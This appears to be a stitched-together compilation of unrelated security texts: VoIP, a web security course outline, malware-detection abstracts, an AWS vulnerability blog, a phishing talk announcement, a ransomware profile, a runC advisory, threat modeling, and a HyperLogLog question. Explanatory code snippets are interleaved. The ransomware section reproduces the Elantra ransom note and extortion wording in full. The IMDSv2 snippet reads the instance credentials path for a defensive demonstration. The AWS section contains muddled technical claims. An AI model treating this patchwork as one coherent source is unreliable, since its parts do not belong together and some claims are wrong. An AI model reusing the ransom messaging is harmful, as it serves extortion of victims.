Moo Wan Kim and Fumikazu Iseki, Tokyo University of Information Sciences, Japan

1. Introduction

This chapter describes a VoIP system for the enterprise network (e.g., a company or university) based on Asterisk (http://www.asterisk.org). Asterisk is open source software for implementing an IP-PBX system, and it supports the various protocols necessary to realize a VoIP system, such as SIP, H.323, MGCP, and SCCP. First, the main ideas and development process are described, based on the VoIP system that we developed using Asterisk in an intranet environment. Then a new scheme to achieve high security using OpenVPN is described for developing a large-scale enterprise network.

2. Basic idea

The following are the main requirements for developing a VoIP system for the enterprise network (Yamamoto et al., 2008):

a. Scalability. In the enterprise network environment, it is not easy to anticipate the traffic because there are many uncontrollable factors. So developing various ...
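To give a flavor of the Asterisk configuration such a system is built on, here is a minimal dialplan sketch; the extension numbers and SIP peer names (alice, bob) are invented for illustration:

; extensions.conf - route internal calls for two SIP phones
[internal]
exten => 100,1,Dial(SIP/alice,20)        ; ring alice's phone for 20 seconds
exten => 100,n,Voicemail(100@default)    ; no answer: fall through to voicemail
exten => 100,n,Hangup()

exten => 101,1,Dial(SIP/bob,20)
exten => 101,n,Voicemail(101@default)
exten => 101,n,Hangup()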
Security: a Many Pronged Word

Security. This word has many meanings, depending on how you look at things. For some people, security means that others should not be able to see the data you are sending or storing. For others, it means making sure you know who is using your system and determining what actions they can perform with it. Sometimes it means ensuring the data cannot be changed in transit. Here we will look at all the different meanings of security and discuss 10 rules you should always adhere to.

- Security Testing is Different
- Applying STRIDE
- The Ten Immutable Laws of Security

How do you keep prying eyes away from your data? Encrypting data ensures that only the intended receiver of the data can understand it. So how does this work? We will look at symmetric keys versus asymmetric ones. We will also look at the most-used encryption algorithms, what role certificates play, and describe how TLS and HTTPS work.

- What is Encryption?
- Understanding Symmetric Keys
- And what about Asymmetric Keys
- Hybrid Encryption
- Properly store Passwords with Hashing and Salts (a sketch follows the course description below)
- What are Digital Signatures?
- Certificates, SSL, TLS and HTTPS
- LAB: Encryption

OWASP Web Security Headers

OWASP defined a couple of special security headers which allow you some control over what the browser will do with your content. In this chapter we will discuss two of these headers.

- Understanding HTTP headers and their role in security
- Setting headers in IIS and ASP.NET Core
- HTTP Strict Transport Security header
- HSTS options
- HTTP Public Key Pinning
- Understanding TOFU and how to mitigate it

Understanding Claims-Based Security

What is a given user allowed to do in your application? This most likely depends on the role that user has in your organisation. This role is now represented with claims. In this chapter you will get a better understanding of why claims are better than roles, and how claims are transmitted in a secure way as tokens.

- Representing the User
- Introducing Claims-Based Security
- Understanding Tokens
- Using Claims in .NET
- LAB: Authenticating a Website with Claims

Modern Web Authentication and Authorization

In the modern web we all want to share stuff. But how do you safely allow one web site to access resources from another web site? With OpenID Connect you can delegate authentication to an identity provider (such as Facebook, Azure AD, Identity Server and others).

- The Internet and a Way of Sharing
- Introducing OAuth and OpenID Connect
- OAuth Fundamentals: Authorization Code Grant, PKCE and Client Credential Grant
- Implementing OpenID Connect Web Sign-in with AzureAD and Identity Server

Protecting a Web-API with OpenID Connect and AzureAD

Modern web sites and mobile apps often consume REST services. You can use OpenID Connect to authenticate users, after which you can use claims to authorize access to resources stored in a web API.

- Protecting a Web API's resources
- Adding permissions to the server side
- Requesting permissions at the client side
- Using the Microsoft Authentication Library (MSAL)
- User consent
- LAB: Getting an access token and passing it to the server

Web Security Threats and Defences

To better protect yourself against attacks, you should first learn what kinds of attacks are common. Once you understand these attacks, we can look at defending against them.
- OWASP - Top 10 security issues
- Broken Access Control
- Cryptographic Failures
- Insecure Design
- Security Misconfiguration
- Vulnerable and Outdated Components
- Identification and Authentication Failures
- Software and Data Integrity Failures
- Security Logging and Monitoring Failures
- Server-Side Request Forgery
- Extra: Denial of Service

The best defence is a good offence. In this hands-on module, you are going to put on your black hat and try to exploit as many vulnerabilities as you can in a web application made just for that.

- Introducing the OWASP Juice Shop
- LAB: Finding vulnerabilities in a webshop

Cyber security is becoming an increasingly important topic for organizations. The quantity and importance of data entrusted to web applications is growing, and defenders need to learn how to secure them. Imagine your organization making the news, not because of some new world-changing product, but because of a data leak containing all your customers' data, including personal information and credit card details! As a modern web developer, mastering these skills is important because you cannot afford not to! This course takes you through the different security threats and defences and teaches you hands-on how to apply them to ASP.NET Core. Among others, you will learn how to authenticate with OpenID Connect and Azure AD, protect your API with OAuth2, and secure your company data with proper encryption techniques. This course provides in-depth, hands-on experience securing your web-based applications. It is meant for developers who have experience with ASP.NET MVC or ASP.NET Core and want to make the world a safer place through applied security best practices.
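Picking up the "Properly store Passwords with Hashing and Salts" topic from the course outline above, here is a minimal, illustrative sketch using Python's standard library; the iteration count is an assumption and should be tuned to current guidance:

import hashlib
import hmac
import os

def hash_password(password: str, iterations: int = 600_000) -> tuple[bytes, bytes]:
    """Return (salt, derived_key); store both, never the plaintext."""
    salt = os.urandom(16)  # unique random salt per user
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, key

def verify_password(password: str, salt: bytes, key: bytes, iterations: int = 600_000) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, key)  # constant-time comparison

salt, key = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, key))  # True
print(verify_password("wrong guess", salt, key))                   # False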
Internet of Things (IoT) devices are increasingly deployed for purposes such as data sensing, collection, and control. IoT improves user experiences by allowing a large number of smart devices to connect and share information. Many existing malware attacks, targeted at traditional computers connected to the Internet, may also be directed at IoT devices, so efficient protection at IoT devices could save millions of internet users from malicious activities. However, existing malware detection approaches suffer from high computational complexity. In this study, the authors propose a faster and more accurate model for detecting malware in the IoT environment. They introduce a Malware Threat Hunting System (MTHS) in the proposed model. MTHS first converts a malware binary into a color image and then conducts machine learning or deep learning analysis for efficient malware detection. They finally prepare a baseline to compare the performance of MTHS with traditional state-of-the-art malware detection approaches. They conduct experiments on two public datasets of Windows and Android software. The experimental results indicate that the response time and the detection accuracy of MTHS are better than those of previous machine learning and deep learning approaches. The article is available here.
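The paper's exact pipeline is not reproduced here, but the binary-to-image idea it builds on is simple to sketch. A minimal illustration (the paper uses color images; this simplified version produces grayscale, and the 256-pixel width is an arbitrary choice):

import numpy as np
from PIL import Image

def binary_to_image(path: str, width: int = 256) -> Image.Image:
    """Render a binary's raw bytes as a grayscale image for ML analysis."""
    data = np.frombuffer(open(path, "rb").read(), dtype=np.uint8)
    rows = max(len(data) // width, 1)
    pixels = np.resize(data, (rows, width))  # pad or truncate into a rectangle
    return Image.fromarray(pixels, mode="L")

# The resulting images can then be fed to a CNN or a classical classifier.
binary_to_image("suspicious_sample.bin").save("suspicious_sample.png")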
Transactions on Cardano are normally validated in phase 1, meaning they are completely verified before they even get onto the network. If something is off, such as inadequate fees or an insufficient balance, the transaction is rejected outright without incurring costs. Smart contracts (Plutus validators), on the other hand, are validated in phase 2: only the node that produces the block verifies the contract fully. In the event of a contract failure, collateral is taken to cover the resources (CPU and memory) used by the node to verify the contract. When a script runs successfully, the collateral is not taken. The chances of losing the collateral are very low; however, Nami seeks to minimize the risk by only allowing a fixed amount (5₳) of collateral to be used. In a worst-case scenario, malicious or poorly built dApps would only be able to take this amount. Finally, collateral aims to prevent bad actors from spamming the network with failing contracts.
Uncovering the Hidden Dangers of AWS Vulnerabilities

By Tom Seest

At BestCybersecurityNews, we help entrepreneurs, solopreneurs, young learners, and seniors learn more about cybersecurity.

To protect your web applications, you need to know about the risks and vulnerabilities. Several areas of AWS can be prone to attack: the Elastic Container Service, cloud storage, network activity, and XML evaluation and rendering issues. Learn more about these services and how you can secure them.

Table of Contents
- How Does Cloud Storage Increase Your Vulnerability to AWS Attacks?
- What Network Activity Triggers an AWS Vulnerability?
- Exploring AWS Security with Elastic Container Service
- XML Vulnerabilities: Uncovering the Risks
- Exploiting SSRF: How Does it Work?
- What Are the Most Common Misconfigurations in AWS Services?
- What InsightIDR Can Do to Protect Your AWS Environment
- Uncovering Vulnerabilities with Rapid7 InsightOps

An AWS vulnerability or attack on cloud storage can be disastrous for a company's reputation. According to McAfee, credentials from 92% of business organizations are for sale on the dark web, and attackers may use these credentials to download sensitive data or disrupt operations. To avoid this, you should configure your cloud backups to use encryption and restrict access. First, check your cloud storage for anomalies in content and read/write patterns. You can also look at network activity to determine whether instances have been intentionally opened to the internet. Similarly, you should look at the identities stored on instances, as they can be used for lateral movement. To protect your data, use multi-factor authentication on privileged accounts. Many organizations don't enable this security feature, making them more vulnerable to social engineering and credential theft attacks. Alternatively, you can implement a single sign-on solution through an identity solution provider. The benefit of this approach is that you can centralize authentication and eliminate the need to manually create IAM users. Furthermore, you can create short-term keys that expire after a predetermined period.

One of the easiest ways to secure your cloud environment is to limit network activity. This can help protect your accounts from a variety of AWS vulnerabilities. For example, AWS Identity and Access Management can ensure that only authorized users can access your cloud account. Likewise, you should make sure that any user inputs are sanitized before they are sent to the cloud. Moreover, you should always apply the principle of least privilege when setting up your cloud environment: it prevents privilege escalation paths and unwanted actions by limiting the privileges that users have. Another important security measure is to protect your AWS account from outside attacks. This is especially important if your AWS resources are accessible via public APIs, so you should always implement a secure identity and access management strategy. AWS also provides tools that help you identify who has access to certain resources, monitor access rights, and record user actions for compliance purposes. In addition, different types of threats can be launched against your AWS services, including DDoS attacks, which can cripple your services and compromise your architecture's security.
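On the short-term keys mentioned above, here is a minimal boto3 sketch that requests temporary credentials with a built-in expiry instead of long-lived access keys (assumes boto3 is installed and AWS credentials are configured; the one-hour duration is illustrative):

import boto3

sts = boto3.client("sts")

# Request credentials that expire after one hour.
response = sts.get_session_token(DurationSeconds=3600)
creds = response["Credentials"]

print(creds["AccessKeyId"])
print(creds["Expiration"])  # after this timestamp, the keys stop working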
AWS recently disclosed a vulnerability affecting Elastic Container Service, which uses Amazon Linux. While the attack is unlikely to affect the majority of users, it can compromise sensitive data. The vulnerability is exploitable in containers running on any underlying server, and it is particularly dangerous because it can enable unprivileged processes to escalate privileges and take full control of the underlying server. AWS has issued fixes for these issues and has notified affected customers. One way to protect your ECS cluster from attacks is to create secure container images that have immutable tags. Additionally, you should never run your containers as privileged, as this gives them all the capabilities of their host. In addition, you should encrypt your container images using a Customer Managed Key. This service is provided by AWS and is required for the use of the Elastic Container Registry; it allows for automated data collection and parallel processing of container data. Another way to secure your ECS clusters is to set up security policies. These policies can limit which tasks are allowed to access sensitive data and can be configured in pods using the securityContext.allowPrivilegeEscalation parameter.

XML evaluation and rendering issues can result in a number of problems. First, they can result in XML errors that compromise a security feature, and the XML processing itself can be corrupted. This can be an issue in AWS, as it can lead to serious security consequences: the disclosure of sensitive data, a denial of service, or unauthorized access to a system's resources. Such a vulnerability - typically an XML External Entity (XXE) issue - may also allow an attacker to upload hostile content to an XML document without the user's knowledge.

SSRF exploitations are web attacks that abuse server-side request handling and allow malicious actors to reach a server's private IP space. The attacker supplies a URL that the vulnerable server then fetches on the attacker's behalf, which can expose sensitive configuration data and compromise a server's reputation. Attackers can also scan internal networks and identify unsecured services, and SSRF is often chained with other attacks, such as reflected XSS and remote code execution. The attack is made possible by exploiting a security flaw in a common application: typically, the attacker needs to control the URL, and sometimes the request headers, that the server will use. If the attacker gains enough access to a server, they can exploit this vulnerability to attack other servers.

AWS offers mitigations for SSRF attacks; one of these is version 2 of the Instance Metadata Service (IMDSv2), which requires session tokens for metadata requests. The metadata service provides configuration and management capabilities and allows instances to be assigned roles without embedding credentials at startup - which is exactly why a compromised server can use it to impersonate a targeted service and obtain sensitive data. For example, a shopping application that queries a backend API with a product ID could be abused to obtain access to sensitive information.
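Relating to the SSRF discussion above: IMDSv2 requires a session token obtained via a PUT request, which the typical SSRF primitive (an attacker-controlled GET) cannot issue. A minimal sketch of the token handshake, runnable only from inside an EC2 instance:

import urllib.request

BASE = "http://169.254.169.254"

# Step 1: obtain a session token; note this must be a PUT with a TTL header.
token_request = urllib.request.Request(
    f"{BASE}/latest/api/token",
    method="PUT",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
)
token = urllib.request.urlopen(token_request).read().decode()

# Step 2: metadata requests must present the token or they are refused.
metadata_request = urllib.request.Request(
    f"{BASE}/latest/meta-data/iam/security-credentials/",
    headers={"X-aws-ec2-metadata-token": token},
)
print(urllib.request.urlopen(metadata_request).read().decode())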
Misconfigurations are common occurrences in cloud environments. While they are difficult to prevent, they can be very easy to correct, and the first step is to make sure your cloud environment is properly configured; many organizations fail to recognize the importance of this task. AWS uses advanced security measures to protect its customers from misconfigurations, but even so, you should still pay attention to the details to keep your cloud environment as secure as possible. For example, a misconfigured security setting can allow an attack to be launched and expose sensitive information. The best way to prevent this is to perform a security design review of your environment and make sure your AWS services are configured correctly. This includes mapping your data flows and using a security questionnaire to determine your attack surface and potential vulnerabilities. In addition, make sure you are not using the default VPC, which can violate APRA, MAS, or NIST standards. You should also make sure your AMI is up to date. By taking these steps, you can make sure your EC2 instances are secure and reliable.

InsightIDR is a cloud-native, AWS-integrated vulnerability detection and response tool that provides comprehensive and contextualized security data. It helps businesses detect critical threats earlier by allowing them to correlate daily events with assets and users. Its flexible search and log normalization capabilities allow organizations to build custom alerts based on their specific needs. It is available through the AWS Marketplace. InsightIDR collects data from all AWS services and can be set up in a matter of hours. It also provides security teams with visibility across their entire network - a tremendous benefit for organizations moving to the cloud. InsightIDR unifies SIEM, endpoint detection, and user behavior analytics. It analyzes billions of events daily to isolate important behaviors and deliver prioritized alerts, and it helps detect stealthy attacks that traditional security tools miss. With real-time telemetry and automated workflows, InsightIDR minimizes the time it takes to investigate threats.

The Rapid7 InsightOps platform provides a complete picture of your AWS environment through log management. It offers a broad suite of security solutions that integrate with CloudTrail and CloudWatch to monitor your application logs and provide actionable remediation reports. This cloud-based security platform is subscription-based, and licenses are based on the number of assets that need to be monitored. The InsightVM dashboard provides context for events, making it easier for DevOps teams to prioritize security tasks. The system prioritizes vulnerabilities based on the Real Risk Score, enabling security teams to prioritize work and reduce measurable risk in the AWS environment. Rapid7 is a leading provider of vulnerability management software and security automation. Its technology helps identify and remediate vulnerabilities before they cause a breach. Its cloud-based vulnerability management solution also offers a live threat intelligence feed and asset management, and its web-based interface is user-friendly with plenty of support.

Please share this post with your friends, family, or business associates who may encounter cybersecurity attacks.
SEATTLE, Nov. 22, 2016 - DomainTools, the leader in domain name and DNS-based cyber threat intelligence, today announced that Tim Helming, director of product management, will present at FireEye's Cyber Defense Summit in Washington, D.C. During his presentation, "Phishy Words: Internet-Scale Patterns of Word Affixes in Phishing Domains", Helming will share tips and tricks that help identify the spam domains presenting the highest risks to organizations, as well as explain how to analyze patterns to gain a better understanding of attackers. The FireEye Cyber Defense Summit 2016 is an annual conference that brings together experts in security technology, threat intelligence, and incident response to address the primary security challenges business and government face today. The event will be held at the Washington Hilton in Washington, D.C. from November 28-30, with Tim Helming presenting on Tuesday, November 29 at 1:10pm ET.

From the last quarter of 2015 through the first quarter of 2016, the Anti-Phishing Working Group (APWG) noted a 250 percent increase in the number of phishing websites. This staggering figure demonstrates exactly why phishing is a top security concern among leading decision makers, CISOs, and IT professionals at businesses of all sizes. One of the more popular ways to generate phishing domains is to add certain words, known as affixes, to the domain names of legitimate organizations in order to make victims believe they are visiting the legitimate site. Helming's presentation will not only demonstrate how to identify malicious affix words that make a domain masquerade as a legitimate domain name; he will also share how to analyze various attribute signals to ensure high confidence in domain risk assessment and proactively prevent phishing attacks before they happen.

FireEye Cyber Defense Summit 2016
Who: Tim Helming, director of product management, DomainTools
What: "Phishy Words: Internet-Scale Patterns of Word Affixes in Phishing Domains"
When: Tuesday, November 29, 1:10pm ET
Where: Washington Hilton, Washington, D.C.

- Identify the words commonly added to the domain names of legitimate organizations (e.g., "login," "account," "my-", etc.) that lead people to believe they are visiting the legitimate site
- Analyze the source (geographical hotspot, domain registrar, TLD, etc.) of the "phishy" word additions used in the most common forms of malicious activity (malware, phishing, spam)
- Determine which types of word affixes present the highest risk to unsuspecting victims in order to better understand attackers and, in some cases, proactively block new malicious domains

For more information on the FireEye Cyber Defense Summit 2016 and to register to attend Tim Helming's presentation, please visit: http://www.fireeyesummit.com/

DomainTools helps security analysts turn threat data into threat intelligence. We take indicators from your network, including domains and IPs, and connect them with nearly every active domain on the Internet. Those connections inform risk assessments, help profile attackers, guide online fraud investigations, and map cyber activity to attacker infrastructure. Fortune 1000 companies, global government agencies, and leading security solution vendors use the DomainTools platform as a critical ingredient in their threat investigation and mitigation work. Learn more about how to connect the dots on malicious activity at https://www.domaintools.com or follow us on Twitter: @domaintools

Barokas PR for DomainTools
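A minimal sketch of the affix pattern Helming describes: flagging lookalike domains that graft common lure words onto a protected brand name. The affix list and the brand are illustrative only:

PHISHY_AFFIXES = ["login", "account", "secure", "verify", "my-", "support"]
PROTECTED_BRAND = "examplebank"  # hypothetical brand to protect

def looks_phishy(domain: str) -> bool:
    """Flag domains that combine the brand with a common lure affix."""
    name = domain.lower().split(".")[0]  # drop the TLD
    if PROTECTED_BRAND not in name or name == PROTECTED_BRAND:
        return False
    remainder = name.replace(PROTECTED_BRAND, "")
    return any(affix in remainder for affix in PHISHY_AFFIXES)

print(looks_phishy("examplebank.com"))          # False: the real domain
print(looks_phishy("login-examplebank.com"))    # True
print(looks_phishy("examplebank-account.net"))  # True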
The Elantra Ransomware is a threatening new malware that has been detected in the wild. Although the infosec community classifies the threat as yet another variant from the already established Matrix Ransomware family, that doesn't diminish its destructive capabilities: Elantra will severely damage any computer it manages to infect. The Elantra Ransomware does so by initiating an encryption routine that employs a combination of strong cryptographic algorithms. All files affected by the threat will be rendered inaccessible and unusable. Elantra will completely change the names of the files it encrypts by substituting the original name with a random string of characters followed by an email address under the control of the hackers - '[email protected].' Upon completion of the encryption process, the threat will proceed to deliver its ransom note containing instructions to the victims. The full set of instructions will be placed inside files named '#How_To_Decrypt_Files#.rtf,' while a shorter message will be displayed in an image set as a new desktop background. Elantra Ransomware's victims are told that they will have to pay a ransom in Bitcoin if they want to receive the necessary key and decryption tool from the cybercriminals. The exact amount is not mentioned, but the ransom note states that the size of the ransom will depend on the time it takes victims to initiate contact. To further push affected users into meeting their demands, the hackers threaten that after 72 hours the decryption key will be deleted from their servers and all locked data will become unsalvageable. Apart from the email found in the encrypted files' names, the ransom note also provides a reserve address at '[email protected].' Victims are allowed to attach up to three files that do not exceed a total size of 10MB, which will be decrypted for free.

The message from the wallpaper image used by the Elantra Ransomware is:

'All your personal files were encrypted with RSA-2048 crypto algorithm! Without your personal key and special software data recovery is impossible! If you want to restore your files, please write us to the e-mails: [email protected] OR [email protected] * Additional info you can find in files: #How_To_Decrypt_Files#.rtf'

The full set of instructions delivered through the '#How_To_Decrypt_Files#.rtf' files is:

'WHAT HAPPENED WITH YOUR FILES? Your documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers. More information about the RSA and AES can be found here: No data from your computer has been stolen or deleted, but it is impossible to restore files without our help. For decrypyion of your files you need two things: first is your private RSA keys and second is our special software - decryption tool. Sure, you can try to restore your files yourself, but the most part of the third-party software changes data within the encrypted file and causes damage to the files and as result, after using third-party software - it will be impossible to decrypt your files even with our software. If you want to restore your files, you have to pay for decryption in Bitcoins. The price depends on how fast you write to us. Contact us using this e-mail address: [email protected] In subjеct linе оf the mеssаgе writе yоur pеrsоnаl ID: - This e-mail will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders. ATTENTION!!!
After 72 hours your unique RSA private key will be automatically deleted from our servers permanently in interest оf оur security, and future decryption of your data will become impossible. If you don't believe in our service and you want to see a proof, you can ask for a test decryption. About the test decryption: You can send us up to 3 encrypted files. The total size of the files must be less than 10Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). We will decrypt and send you decrypted files back. In a case of no answer in 24 hours, usе thе rеsеrvе е-mаil аddrеss: [email protected] * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * It doesn't make sense to complain of us and to arrange a hysterics. * Complaints having blocked e-mail, you deprive a possibility of the others, to decipher the computers. * Other people at whom computers are also ciphered you deprive of the ONLY hope to decipher. FOREVER.'
Despite the huge advantages that containers offer in application portability, acceleration of CI/CD pipelines and agility of deployment environments, the biggest concern has always been about isolation. Since all the containers running on a host share the same underlying kernel, any malicious code breaking out of a container can compromise the entire host, and hence all the applications running on the host and potentially in the cluster. That fear of container isolation failing to hold up turned out to be true yesterday when a vulnerability in runC was announced. runC is the key and most popular software component that container engines rely on for spinning up containers on a host. The announced vulnerability allows an attacker to break out of the container isolation through a well-crafted attack (technical details of the vulnerability and the exploit are at https://seclists.org/oss-sec/2019/q1/119) and compromise the entire host. The vulnerability is particularly nasty because it is not covered by the default AppArmor or SELinux kernel-enforced sandboxing policies.
What can you do to protect your containerized applications? Even though the exploit is tricky to execute, the exploit code will be released publicly on February 18, so it's best to protect your container environment by doing the following:
- Know which nodes (Docker hosts) your containers are running on, and whether they are running a vulnerable version of Docker Engine (a quick version check is sketched below). If you are a Qualys customer, you can use AssetView to get that information. Docker has released the patch in version 18.09.2.
- Upgrade your Docker hosts to version 18.09.2.
- For hosts managed by public cloud service providers, keep a close watch on how they are addressing the issue. GCP – https://cloud.google.com/kubernetes-engine/docs/security-bulletins AWS – https://aws.amazon.com/security/security-bulletins/AWS-2019-002/
- Qualys is working on releasing the following detections (QIDs), and more vendor-specific QIDs will be launched in the coming days. 237121: Red Hat Update for docker (RHSA-2019:0304) 237120: Red Hat Update for runc (RHSA-2019:0303) 351500: Amazon Linux Security Advisory for docker: ALAS-2019-1156 371641: Runc Container Breakout Vulnerability
You can get more details at Qualys Threat Protection.
What to do in the future? It's good to be concerned about any new technology while it matures, but it's equally important to harden the application build and deployment workflows in order to prevent attackers from getting an easy lead into exploiting deployed containers.
- Ensure that only those container images that have gone through the defined compliance checks (related to vulnerabilities, packages, etc.) are deployed in production. As an example, you can use the Qualys Container Security solution to promote only those built images that pass the compliance checks on the build nodes.
- Privileged containers, if compromised, can bring down the entire container cluster. Hence, keep a close watch on all privileged containers running in your environment.
(Asif Awan is CTO for Container Security at Qualys)
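As a quick way to audit the first item above, the Docker Engine version on each host can be compared against the patched release. A minimal sketch, assuming the docker CLI is installed on the host and the daemon is reachable:

import subprocess

# Ask the daemon for its version, e.g. "18.09.1" or "17.12.1-ce"
version = subprocess.run(
    ["docker", "version", "--format", "{{.Server.Version}}"],
    capture_output=True, text=True, check=True,
).stdout.strip()

def as_tuple(v):
    # "18.09.1-ce" -> (18, 9, 1); numeric compare beats string compare here
    return tuple(int(part.split("-")[0]) for part in v.split("."))

if as_tuple(version) < (18, 9, 2):
    print(f"VULNERABLE: Docker Engine {version} predates the 18.09.2 fix")
else:
    print(f"OK: Docker Engine {version}")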
The logging API is designed to allow C applications to produce messages of interest and write them to the Access Manager logs. When some type of event occurs in an external application, the application code first determines whether the logging module (a file created for messages usually relevant to a specific function or feature) to which the event is relevant has a level high enough to log the event. (A level specifies importance and defines the amount of detail that will be logged.) If the determination is affirmative, a log message is generated and a log record created in the relevant logging module. Information in the log record can be updated as necessary. The following notes apply to the C logging API: The application must call the am_log_init() function before using any other am_log_* interfaces. If any of the SSO, authentication, or policy initialization functions (am_sso_init(), am_auth_init(), or am_policy_init()) is called, am_log_init() does not need to be called, as each of those three functions calls am_log_init() internally. The am_log_record_* interfaces can be used to set or update information in the log record. They include: The following are convenience functions that provide simplified access to existing log records. They include:
Network intrusion detection aims at distinguishing attacks on the Internet from normal use of the Internet. This is a typical classification problem, so intrusion detection (ID) can be seen as a pattern recognition problem. In this paper, we build an intrusion detection system using AdaBoost, a prevailing machine learning algorithm, to construct the detection classifier. In the algorithm, RBF neural networks are used as weak classifiers. Because the training set is multi-attribute, non-linear, and massive, we use a non-linear dimension reduction method from pattern recognition, the Isomap algorithm, for feature extraction and to improve training and classification speed. The feature dimension after extraction and the number of AdaBoost training rounds were studied and experimented with. Finally, the experiments prove the effectiveness of the combined Isomap and AdaBoost method.
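The pipeline described in this abstract can be approximated with off-the-shelf tools. A minimal sketch, assuming a synthetic dataset in place of the intrusion-detection training set and decision stumps in place of the RBF-network weak classifiers (scikit-learn's AdaBoost does not ship an RBF-network base estimator):

from sklearn.datasets import make_classification
from sklearn.ensemble import AdaBoostClassifier
from sklearn.manifold import Isomap
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline

# Stand-in for a massive, multi-attribute, non-linear training set
X, y = make_classification(n_samples=2000, n_features=40, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

# Isomap reduces the feature dimension first; AdaBoost then builds
# the detection classifier over the reduced features.
model = make_pipeline(
    Isomap(n_neighbors=8, n_components=10),
    AdaBoostClassifier(n_estimators=50, random_state=0),
)
model.fit(X_train, y_train)
print("detection accuracy:", model.score(X_test, y_test))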
Overview of HTTP Status Codes for Software Testers
HTTP status codes are three-digit numbers that describe the current status of a client's request to a server. These codes are returned by the server as a response to a client's HTTP request, and they indicate whether the request was successful, failed, or was redirected to another resource. A request is made to the server (where the website is hosted) each time a Uniform Resource Locator (URL) is entered into the client browser. In other words, the client sends a Hypertext Transfer Protocol (HTTP) request to the server, and the server replies with an HTTP status code indicating whether the request was successful or not. In short, every request submitted via the HTTP protocol receives an answer from the server in the form of a status code.
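A tester can observe these codes directly from a script. A minimal sketch, assuming the third-party requests library and using httpbin.org as a demo endpoint:

import requests

# Each endpoint below is built to return the named status code
for url in ("https://httpbin.org/status/200",
            "https://httpbin.org/status/404",
            "https://httpbin.org/status/503"):
    response = requests.get(url, allow_redirects=False)
    print(url, "->", response.status_code, response.reason)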
This article was originally written by Robert Reichel for the GitHub blog. To see the original article in its entirety, click HERE. One of the most effective tools for DevOps teams looking to increase the security of their applications is threat modeling. Threat modeling involves bringing security and engineering teams together to discuss systems and generate action items that improve the security of the system. Here at GitHub, threat modeling has helped us improve communication between our security and engineering teams, has made the security review process more proactive, and has led to more reliable and more secure system designs. The creation of a threat model is a collaborative security exercise where we evaluate and validate the design and task planning for a new or existing service. This exercise involves structured thinking about potential security vulnerabilities that could adversely affect a service. Every threat modeling conversation should have at least the following goals:
- Ensuring everyone understands how the system works.
- Evaluating the surface area and developing the most likely points of compromise.
- Developing mitigation strategies to be implemented for each point of compromise.
The simple act of sitting down and discussing the system holistically provides a great opportunity for everyone to discuss the underlying system. Knowledge sharing between the teams helps everyone grow in their knowledge of the systems in the environment. It also contributes to the development of vulnerability mitigation strategies for issues discovered during the threat model review, which improves the security posture of the entire organization. Government agencies looking to embrace threat modeling within their own organizations may not know where to start. So, here is the process that we follow at GitHub, which has delivered system-wide security improvements, proactive design guidance, and improved communication between security and engineering teams:
Decide when to threat model
At GitHub, we typically do threat modeling on a set cadence with each of the feature teams, and before the release of any new features that make major changes to the architecture. Depending on the amount of engineering taking place on a feature, you may need a faster cadence (every couple of months) or a slower one (once per year). If you have an existing cadence of software review, we've found that integrating threat modeling with those existing processes helps everyone to adapt to adding a new security process. Regardless of your timing, set guidelines, and be flexible.
Build the threat model
Threat modeling is usually a collaborative exercise, so the engineering team for the product and the security team will get together to talk through the architecture and potential security concerns. Ahead of time, our security team will provide documentation and examples to the engineering teams on effective threat modeling. We typically ask each engineering team to generate a model in advance, covering a significant part of a system to review as part of a single threat modeling conversation. Setting these expectations early (and doing the homework) helps to ensure that the meeting is effective. Though the process and discussions matter more than the specific output, at GitHub we ask the engineering team to bring a threat model developed either in Microsoft's Threat Modeling Tool or OWASP's Threat Dragon (both are entirely free).
These tools enable the teams to clearly present important information for the threat model, such as APIs, trust boundaries, dependencies, datastores, and authentication mechanisms. In addition to providing some consistency between teams, these files will also act as important collateral to share with any auditors if you need to meet various security compliance requirements.
Review the threat model
When it's time to review the threat model, we typically schedule a one-hour session, broken into two parts. The first five to 10 minutes of every session is spent with the engineering team understanding the design of the system that is being reviewed. This time ensures that everyone is on the same page and helps clarify any ambiguities in the previously prepared threat model—including which technologies are being used and any design quirks. After everyone is aligned, we can jump right into the security discussion. At this point, we've found it helpful to use a framework to methodically address different vulnerability classes. One of the methodologies we frequently use is Microsoft's STRIDE model—Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Escalation of Privilege—a mnemonic covering common attack vectors which may be found in an application. Stepping through these classes while looking at the overarching system enables the security teams to look holistically at the system being analyzed and ensure that they cover the most likely threats. Following STRIDE fills the remainder of the hour as the conversation expands and more parts of the system get unpacked. As potential security vulnerabilities or design flaws are found, the security team takes note of them as well as potential remediations, so that we can generate a list of potential changes for the engineering team to consider making after the session. We found that as threat modeling became more common across GitHub, teams learned to engage the security team while developing the system—which is better, as it fostered getting ahead of potential issues and addressing major architectural changes before hands hit keyboards. This in turn helped the security teams deploy better defense in depth through secure design principles. As the session draws to an end, we recount the key findings and improvements that the teams should make and generate tracking items for those. A summary is distributed to the participants, and anyone is free to ask follow-up questions to better flesh out the action items. Threat modeling is an incredible way for government DevOps teams to identify vulnerabilities in their applications and make them more secure. GitHub's methodology for threat modeling has generated incredible results for the company—enabling the development of vulnerability mitigation strategies, guiding engineering teams away from system designs that might present future vulnerabilities, and building connections between the engineering and security teams that make it easier to reach out—in both directions.
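A lightweight way to keep the STRIDE walkthrough methodical is to generate the checklist ahead of the session. A minimal sketch (not GitHub's tooling; the component names are placeholders):

STRIDE = ("Spoofing", "Tampering", "Repudiation", "Information Disclosure",
          "Denial of Service", "Escalation of Privilege")

components = ["API gateway", "auth service", "user datastore"]  # placeholders

# One checkbox per component/threat pair keeps the review from skipping classes
for component in components:
    for threat in STRIDE:
        print(f"[ ] {component}: {threat} - likely attack? mitigation? owner?")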
I know how HyperLogLog works, but I want to understand in which real-world situations it really applies, i.e., where it makes sense to use HyperLogLog and why. If you've used it in solving any real-world problems, please share. What I am looking for is: given HyperLogLog's standard error, in which real-world applications is it really used today, and why does it work?
